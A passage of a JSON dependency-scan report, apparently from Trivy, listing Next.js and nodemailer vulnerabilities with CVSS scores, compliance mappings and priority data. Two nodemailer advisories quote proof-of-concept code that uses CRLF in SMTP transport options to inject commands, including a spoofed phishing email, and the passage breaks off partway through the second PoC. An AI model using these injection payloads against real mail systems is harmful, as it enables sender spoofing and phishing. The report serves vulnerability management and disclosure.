"11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 6.6688, + "epss": 8e-05, + "epss_percentile": 0.00741, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 2, + "epss_multiplier": 1.00032, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f3c2cbad0f8c4f0a", + "ruleId": "CVE-2026-44582", + "severity": "LOW", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "Next.js vulnerable to cache poisoning via collisions in React Server Component cache-busting", + "title": "CVE-2026-44582", + "description": "Next.js is a React framework for building full-stack web applications. From 13.4.6 to before 15.5.16 and 16.2.5, React Server Component responses can be vulnerable to cache poisoning in deployments that rely on shared caches with insufficient response partitioning. In affected conditions, collisions in the _rsc cache-busting value can allow an attacker to poison cache entries so users receive the wrong response variant for a given URL. This vulnerability is fixed in 15.5.16 and 16.2.5.", + "remediation": "https://avd.aquasec.com/nvd/cve-2026-44582", + "references": [], + "tags": [ + "vulnerability", + "pkg:next@14.2.3" + ], + "risk": { + "cwe": [ + "CWE-328" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2026-44582", + "VendorIDs": [ + "GHSA-vfv6-92ff-j949" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "15.5.16, 16.2.5", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44582", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:5355cf71971ed497dc9db80439cbc15aecaca5f44147444b410ea52d3870a09d", + "Title": "Next.js vulnerable to cache poisoning via collisions in React Server Component cache-busting", + "Description": "Next.js is a React framework for building full-stack web applications. From 13.4.6 to before 15.5.16 and 16.2.5, React Server Component responses can be vulnerable to cache poisoning in deployments that rely on shared caches with insufficient response partitioning. In affected conditions, collisions in the _rsc cache-busting value can allow an attacker to poison cache entries so users receive the wrong response variant for a given URL. This vulnerability is fixed in 15.5.16 and 16.2.5.", + "Severity": "LOW", + "CweIDs": [ + "CWE-328" + ], + "VendorSeverity": { + "ghsa": 1 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V3Score": 3.7 + } + }, + "References": [ + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/releases/tag/v15.5.16", + "https://github.com/vercel/next.js/releases/tag/v16.2.5", + "https://github.com/vercel/next.js/security/advisories/GHSA-vfv6-92ff-j949", + "https://nvd.nist.gov/vuln/detail/CVE-2026-44582" + ], + "PublishedDate": "2026-05-13T18:16:19.037Z", + "LastModifiedDate": "2026-05-14T18:15:03.26Z" + }, + "context": { + "sbom": { + "name": "next", + "version": "14.2.3", + "path": "/package-lock.json" + } + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 6.671999999999999, + "epss": 0.0002, + "epss_percentile": 0.05498, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 2, + "epss_multiplier": 1.0008, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "44b697423f0e8861", + "ruleId": "CVE-2025-14874", + "severity": "HIGH", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "nodemailer: Nodemailer: Denial of service via crafted email address header", + "title": "CVE-2025-14874", + "description": "A flaw was found in Nodemailer. This vulnerability allows a denial of service (DoS) via a crafted email address header that triggers infinite recursion in the address parser.", + "remediation": "https://avd.aquasec.com/nvd/cve-2025-14874", + "references": [], + "tags": [ + "vulnerability", + "pkg:nodemailer@6.10.1" + ], + "risk": { + "cwe": [ + "CWE-703" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2025-14874", + "VendorIDs": [ + "GHSA-rcmh-qjqh-p98v" + ], + "PkgID": "nodemailer@6.10.1", + "PkgName": "nodemailer", + "PkgIdentifier": { + "PURL": "pkg:npm/nodemailer@6.10.1", + "UID": "c243d03ecfce3c20" + }, + "InstalledVersion": "6.10.1", + "FixedVersion": "7.0.11", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-14874", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:966cf7be028923c9a0026859ad211dbe6884c63fd7e0af1c79f4c19409cbe98a", + "Title": "nodemailer: Nodemailer: Denial of service via crafted email address header", + "Description": "A flaw was found in Nodemailer. This vulnerability allows a denial of service (DoS) via a crafted email address header that triggers infinite recursion in the address parser.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-703" + ], + "VendorSeverity": { + "ghsa": 3, + "nvd": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2025-14874", + "https://bugzilla.redhat.com/show_bug.cgi?id=2418133", + "https://github.com/nodemailer/nodemailer", + "https://github.com/nodemailer/nodemailer/commit/b61b9c0cfd682b6f647754ca338373b68336a150", + "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-rcmh-qjqh-p98v", + "https://nvd.nist.gov/vuln/detail/CVE-2025-14874", + "https://www.cve.org/CVERecord?id=CVE-2025-14874" + ], + "PublishedDate": "2025-12-18T09:15:44.87Z", + "LastModifiedDate": "2026-01-08T03:15:43.19Z" + }, + "context": { + "sbom": { + "name": "nodemailer", + "version": "6.10.1", + "path": "/package-lock.json" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 23.477999999999998, + "epss": 0.00155, + "epss_percentile": 0.3573, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 7, + "epss_multiplier": 1.0062, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "8c54dd19fd34e976", + "ruleId": "CVE-2025-13033", + "severity": "MEDIUM", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "nodemailer: Nodemailer: Email to an unintended domain can occur due to Interpretation Conflict", + "title": "CVE-2025-13033", + "description": "A vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker's external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls.", + "remediation": "https://avd.aquasec.com/nvd/cve-2025-13033", + "references": [], + "tags": [ + "vulnerability", + "pkg:nodemailer@6.10.1" + ], + "risk": { + "cwe": [ + "CWE-1286" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2025-13033", + "VendorIDs": [ + "GHSA-mm7p-fcc7-pg87" + ], + "PkgID": "nodemailer@6.10.1", + "PkgName": "nodemailer", + "PkgIdentifier": { + "PURL": "pkg:npm/nodemailer@6.10.1", + "UID": "c243d03ecfce3c20" + }, + "InstalledVersion": "6.10.1", + "FixedVersion": "7.0.7", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-13033", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:718ace41991afee3a924eee3b40006635632701df5e1f2e2afabf15077a6d79b", + "Title": "nodemailer: Nodemailer: Email to an unintended domain can occur due to Interpretation Conflict", + "Description": "A vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker's external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-1286" + ], + "VendorSeverity": { + "ghsa": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P", + "V40Score": 5.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:15979", + "https://access.redhat.com/errata/RHSA-2026:3751", + "https://access.redhat.com/security/cve/CVE-2025-13033", + "https://bugzilla.redhat.com/show_bug.cgi?id=2402179", + "https://github.com/nodemailer/nodemailer", + "https://github.com/nodemailer/nodemailer/commit/1150d99fba77280df2cfb1885c43df23109a8626", + "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-mm7p-fcc7-pg87", + "https://nvd.nist.gov/vuln/detail/CVE-2025-13033", + "https://www.cve.org/CVERecord?id=CVE-2025-13033" + ], + "PublishedDate": "2025-11-14T20:15:45.957Z", + "LastModifiedDate": "2026-05-11T13:16:10.037Z" + }, + "context": { + "sbom": { + "name": "nodemailer", + "version": "6.10.1", + "path": "/package-lock.json" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 13.349866666666665, + "epss": 0.00031, + "epss_percentile": 0.0896, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.00124, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "314c4b93bbc126bb", + "ruleId": "GHSA-vvjj-xcjg-gr5g", + "severity": "MEDIUM", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "Nodemailer Vulnerable to SMTP Command Injection via CRLF in Transport name Option (EHLO/HELO) ", + "title": "GHSA-vvjj-xcjg-gr5g", + "description": "### Summary\n\nNodemailer versions up to and including 8.0.4 are vulnerable to SMTP command injection via CRLF sequences in the transport `name` configuration option. The `name` value is used directly in the EHLO/HELO SMTP command without any sanitization for carriage return and line feed characters (`\\r\\n`). An attacker who can influence this option can inject arbitrary SMTP commands, enabling unauthorized email sending, email spoofing, and phishing attacks.\n\n### Details\n\nThe vulnerability exists in `lib/smtp-connection/index.js`. When establishing an SMTP connection, the `name` option is concatenated directly into the EHLO command:\n\n```javascript\n// lib/smtp-connection/index.js, line 71\nthis.name = this.options.name || this._getHostname();\n\n// line 1336\nthis._sendCommand('EHLO ' + this.name);\n```\n\nThe `_sendCommand` method writes the string directly to the socket followed by `\\r\\n` (line 1082):\n\n```javascript\nthis._socket.write(Buffer.from(str + '\\r\\n', 'utf-8'));\n```\n\nIf the `name` option contains `\\r\\n` sequences, each injected line is interpreted by the SMTP server as a separate command. Unlike the `envelope.from` and `envelope.to` fields which are validated for `\\r\\n` (line 1107-1119), and unlike `envelope.size` which was recently fixed (GHSA-c7w3-x93f-qmm8) by casting to a number, the `name` parameter receives no CRLF sanitization whatsoever.\n\nThis is distinct from the previously reported GHSA-c7w3-x93f-qmm8 (envelope.size injection) as it affects a different parameter (`name` vs `size`), uses a different injection point (EHLO command vs MAIL FROM command), and occurs at connection initialization rather than during message sending.\n\nThe `name` option is also used in HELO (line 1384) and LHLO (line 1333) commands with the same lack of sanitization.\n\n### PoC\n\n```javascript\nconst nodemailer = require('nodemailer');\nconst net = require('net');\n\n// Simple SMTP server to observe injected commands\nconst server = net.createServer(socket => {\n socket.write('220 test ESMTP\\r\\n');\n socket.on('data', data => {\n const lines = data.toString().split('\\r\\n').filter(l => l);\n lines.forEach(line => {\n console.log('SMTP CMD:', line);\n if (line.startsWith('EHLO') || line.startsWith('HELO'))\n socket.write('250 OK\\r\\n');\n else if (line.startsWith('MAIL FROM'))\n socket.write('250 OK\\r\\n');\n else if (line.startsWith('RCPT TO'))\n socket.write('250 OK\\r\\n');\n else if (line === 'DATA')\n socket.write('354 Go\\r\\n');\n else if (line === '.')\n socket.write('250 OK\\r\\n');\n else if (line === 'QUIT')\n { socket.write('221 Bye\\r\\n'); socket.end(); }\n else if (line === 'RSET')\n socket.write('250 OK\\r\\n');\n });\n });\n});\n\nserver.listen(0, '127.0.0.1', () => {\n const port = server.address().port;\n\n // Inject a complete phishing email via EHLO name\n const transport = nodemailer.createTransport({\n host: '127.0.0.1',\n port: port,\n secure: false,\n name: 'legit.host\\r\\nMAIL FROM:\\r\\n'\n + 'RCPT TO:\\r\\nDATA\\r\\n'\n + 'From: ceo@company.com\\r\\nTo: victim@target.com\\r\\n'\n + 'Subject: Urgent\\r\\n\\r\\nPhishing content\\r\\n.\\r\\nRSET'\n });\n\n transport.sendMail({\n from: 'legit@example.com',\n to: 'legit-recipient@example.com',\n subject: 'Normal email',\n text: 'Normal content'\n }, () => { server.close(); process.exit(0); });\n});\n```\n\nRunning this PoC shows the SMTP server receives the injected MAIL FROM, RCPT TO, DATA, and phishing email content as separate SMTP commands before the legitimate email is sent.\n\n### Impact\n\n**Who is affected:** Applications that allow users or external input to configure the `name` SMTP transport option. This includes:\n- Multi-tenant SaaS platforms with per-tenant SMTP configuration\n- Admin panels where SMTP hostname/name settings are stored in databases\n- Applications loading SMTP config from environment variables or external sources\n\n**What can an attacker do:**\n1. **Send unauthorized emails** to arbitrary recipients by injecting MAIL FROM and RCPT TO commands\n2. **Spoof email senders** by injecting arbitrary From headers in the DATA portion\n3. **Conduct phishing attacks** using the legitimate SMTP server as a relay\n4. **Bypass application-level controls** on email recipients, since the injected commands are processed before the application's intended MAIL FROM/RCPT TO\n5. **Perform SMTP reconnaissance** by injecting commands like VRFY or EXPN\n\nThe injection occurs at the EHLO stage (before authentication in most SMTP flows), making it particularly dangerous as the injected commands may be processed with the server's trust context.\n\n**Recommended fix:** Sanitize the `name` option by stripping or rejecting CRLF sequences, similar to how `envelope.from` and `envelope.to` are already validated on lines 1107-1119 of `lib/smtp-connection/index.js`. For example:\n\n```javascript\nthis.name = (this.options.name || this._getHostname()).replace(/[\\r\\n]/g, '');\n```", + "remediation": "https://github.com/advisories/GHSA-vvjj-xcjg-gr5g", + "references": [], + "tags": [ + "vulnerability", + "pkg:nodemailer@6.10.1" + ], + "raw": { + "VulnerabilityID": "GHSA-vvjj-xcjg-gr5g", + "PkgID": "nodemailer@6.10.1", + "PkgName": "nodemailer", + "PkgIdentifier": { + "PURL": "pkg:npm/nodemailer@6.10.1", + "UID": "c243d03ecfce3c20" + }, + "InstalledVersion": "6.10.1", + "FixedVersion": "8.0.5", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://github.com/advisories/GHSA-vvjj-xcjg-gr5g", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:17380daa219fcd2acb5ff13abdf591be99d5ba1498a2e827b85876cb23d42d77", + "Title": "Nodemailer Vulnerable to SMTP Command Injection via CRLF in Transport name Option (EHLO/HELO) ", + "Description": "### Summary\n\nNodemailer versions up to and including 8.0.4 are vulnerable to SMTP command injection via CRLF sequences in the transport `name` configuration option. The `name` value is used directly in the EHLO/HELO SMTP command without any sanitization for carriage return and line feed characters (`\\r\\n`). An attacker who can influence this option can inject arbitrary SMTP commands, enabling unauthorized email sending, email spoofing, and phishing attacks.\n\n### Details\n\nThe vulnerability exists in `lib/smtp-connection/index.js`. When establishing an SMTP connection, the `name` option is concatenated directly into the EHLO command:\n\n```javascript\n// lib/smtp-connection/index.js, line 71\nthis.name = this.options.name || this._getHostname();\n\n// line 1336\nthis._sendCommand('EHLO ' + this.name);\n```\n\nThe `_sendCommand` method writes the string directly to the socket followed by `\\r\\n` (line 1082):\n\n```javascript\nthis._socket.write(Buffer.from(str + '\\r\\n', 'utf-8'));\n```\n\nIf the `name` option contains `\\r\\n` sequences, each injected line is interpreted by the SMTP server as a separate command. Unlike the `envelope.from` and `envelope.to` fields which are validated for `\\r\\n` (line 1107-1119), and unlike `envelope.size` which was recently fixed (GHSA-c7w3-x93f-qmm8) by casting to a number, the `name` parameter receives no CRLF sanitization whatsoever.\n\nThis is distinct from the previously reported GHSA-c7w3-x93f-qmm8 (envelope.size injection) as it affects a different parameter (`name` vs `size`), uses a different injection point (EHLO command vs MAIL FROM command), and occurs at connection initialization rather than during message sending.\n\nThe `name` option is also used in HELO (line 1384) and LHLO (line 1333) commands with the same lack of sanitization.\n\n### PoC\n\n```javascript\nconst nodemailer = require('nodemailer');\nconst net = require('net');\n\n// Simple SMTP server to observe injected commands\nconst server = net.createServer(socket => {\n socket.write('220 test ESMTP\\r\\n');\n socket.on('data', data => {\n const lines = data.toString().split('\\r\\n').filter(l => l);\n lines.forEach(line => {\n console.log('SMTP CMD:', line);\n if (line.startsWith('EHLO') || line.startsWith('HELO'))\n socket.write('250 OK\\r\\n');\n else if (line.startsWith('MAIL FROM'))\n socket.write('250 OK\\r\\n');\n else if (line.startsWith('RCPT TO'))\n socket.write('250 OK\\r\\n');\n else if (line === 'DATA')\n socket.write('354 Go\\r\\n');\n else if (line === '.')\n socket.write('250 OK\\r\\n');\n else if (line === 'QUIT')\n { socket.write('221 Bye\\r\\n'); socket.end(); }\n else if (line === 'RSET')\n socket.write('250 OK\\r\\n');\n });\n });\n});\n\nserver.listen(0, '127.0.0.1', () => {\n const port = server.address().port;\n\n // Inject a complete phishing email via EHLO name\n const transport = nodemailer.createTransport({\n host: '127.0.0.1',\n port: port,\n secure: false,\n name: 'legit.host\\r\\nMAIL FROM:\\r\\n'\n + 'RCPT TO:\\r\\nDATA\\r\\n'\n + 'From: ceo@company.com\\r\\nTo: victim@target.com\\r\\n'\n + 'Subject: Urgent\\r\\n\\r\\nPhishing content\\r\\n.\\r\\nRSET'\n });\n\n transport.sendMail({\n from: 'legit@example.com',\n to: 'legit-recipient@example.com',\n subject: 'Normal email',\n text: 'Normal content'\n }, () => { server.close(); process.exit(0); });\n});\n```\n\nRunning this PoC shows the SMTP server receives the injected MAIL FROM, RCPT TO, DATA, and phishing email content as separate SMTP commands before the legitimate email is sent.\n\n### Impact\n\n**Who is affected:** Applications that allow users or external input to configure the `name` SMTP transport option. This includes:\n- Multi-tenant SaaS platforms with per-tenant SMTP configuration\n- Admin panels where SMTP hostname/name settings are stored in databases\n- Applications loading SMTP config from environment variables or external sources\n\n**What can an attacker do:**\n1. **Send unauthorized emails** to arbitrary recipients by injecting MAIL FROM and RCPT TO commands\n2. **Spoof email senders** by injecting arbitrary From headers in the DATA portion\n3. **Conduct phishing attacks** using the legitimate SMTP server as a relay\n4. **Bypass application-level controls** on email recipients, since the injected commands are processed before the application's intended MAIL FROM/RCPT TO\n5. **Perform SMTP reconnaissance** by injecting commands like VRFY or EXPN\n\nThe injection occurs at the EHLO stage (before authentication in most SMTP flows), making it particularly dangerous as the injected commands may be processed with the server's trust context.\n\n**Recommended fix:** Sanitize the `name` option by stripping or rejecting CRLF sequences, similar to how `envelope.from` and `envelope.to` are already validated on lines 1107-1119 of `lib/smtp-connection/index.js`. For example:\n\n```javascript\nthis.name = (this.options.name || this._getHostname()).replace(/[\\r\\n]/g, '');\n```", + "Severity": "MEDIUM", + "VendorSeverity": { + "ghsa": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N", + "V3Score": 4.9 + } + }, + "References": [ + "https://github.com/nodemailer/nodemailer", + "https://github.com/nodemailer/nodemailer/commit/0a43876801a420ca528f492eaa01bfc421cc306e", + "https://github.com/nodemailer/nodemailer/releases/tag/v8.0.5", + "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-vvjj-xcjg-gr5g" + ], + "PublishedDate": "2026-04-08T15:05:20Z", + "LastModifiedDate": "2026-04-08T15:05:20Z" + }, + "context": { + "sbom": { + "name": "nodemailer", + "version": "6.10.1", + "path": "/package-lock.json" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "17548d349adde40e", + "ruleId": "GHSA-c7w3-x93f-qmm8", + "severity": "LOW", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "Nodemailer has SMTP command injection due to unsanitized `envelope.size` parameter", + "title": "GHSA-c7w3-x93f-qmm8", + "description": "### Summary\nWhen a custom `envelope` object is passed to `sendMail()` with a `size` property containing CRLF characters (`\\r\\n`), the value is concatenated directly into the SMTP `MAIL FROM` command without sanitization. This allows injection of arbitrary SMTP commands, including `RCPT TO` — silently adding attacker-controlled recipients to outgoing emails.\n\n\n### Details\nIn `lib/smtp-connection/index.js` (lines 1161-1162), the `envelope.size` value is concatenated into the SMTP `MAIL FROM` command without any CRLF sanitization:\n\n```javascript\nif (this._envelope.size && this._supportedExtensions.includes('SIZE')) {\n args.push('SIZE=' + this._envelope.size);\n}\n```\n\nThis contrasts with other envelope parameters in the same function that ARE properly sanitized:\n- **Addresses** (`from`, `to`): validated for `[\\r\\n<>]` at lines 1107-1127\n- **DSN parameters** (`dsn.ret`, `dsn.envid`, `dsn.orcpt`): encoded via `encodeXText()` at lines 1167-1183\n\nThe `size` property reaches this code path through `MimeNode.setEnvelope()` in `lib/mime-node/index.js` (lines 854-858), which copies all non-standard envelope properties verbatim:\n\n```javascript\nconst standardFields = ['to', 'cc', 'bcc', 'from'];\nObject.keys(envelope).forEach(key => {\n if (!standardFields.includes(key)) {\n this._envelope[key] = envelope[key];\n }\n});\n```\n\nSince `_sendCommand()` writes the command string followed by `\\r\\n` to the raw TCP socket, a CRLF in the `size` value terminates the `MAIL FROM` command and starts a new SMTP command.\n\nNote: by default, Nodemailer constructs the envelope automatically from the message's `from`/`to` fields and does not include `size`. This vulnerability requires the application to explicitly pass a custom `envelope` object with a `size` property to `sendMail()`. \nWhile this limits the attack surface, applications that expose envelope configuration to users are affected.\n\n### PoC\nave the following as `poc.js` and run with `node poc.js`:\n\n```javascript\nconst net = require('net');\nconst nodemailer = require('nodemailer');\n\n// Minimal SMTP server that logs raw commands\nconst server = net.createServer(socket => {\n socket.write('220 localhost ESMTP\\r\\n');\n let buffer = '';\n socket.on('data', chunk => {\n buffer += chunk.toString();\n const lines = buffer.split('\\r\\n');\n buffer = lines.pop();\n for (const line of lines) {\n if (!line) continue;\n console.log('C:', line);\n if (line.startsWith('EHLO')) {\n socket.write('250-localhost\\r\\n250-SIZE 10485760\\r\\n250 OK\\r\\n');\n } else if (line.startsWith('MAIL FROM')) {\n socket.write('250 OK\\r\\n');\n } else if (line.startsWith('RCPT TO')) {\n socket.write('250 OK\\r\\n');\n } else if (line === 'DATA') {\n socket.write('354 Start\\r\\n');\n } else if (line === '.') {\n socket.write('250 OK\\r\\n');\n } else if (line.startsWith('QUIT')) {\n socket.write('221 Bye\\r\\n');\n socket.end();\n }\n }\n });\n});\n\nserver.listen(0, '127.0.0.1', () => {\n const port = server.address().port;\n console.log('SMTP server on port', port);\n console.log('Sending email with injected RCPT TO...\\n');\n\n const transporter = nodemailer.createTransport({\n host: '127.0.0.1',\n port,\n secure: false,\n tls: { rejectUnauthorized: false },\n });\n\n transporter.sendMail({\n from: 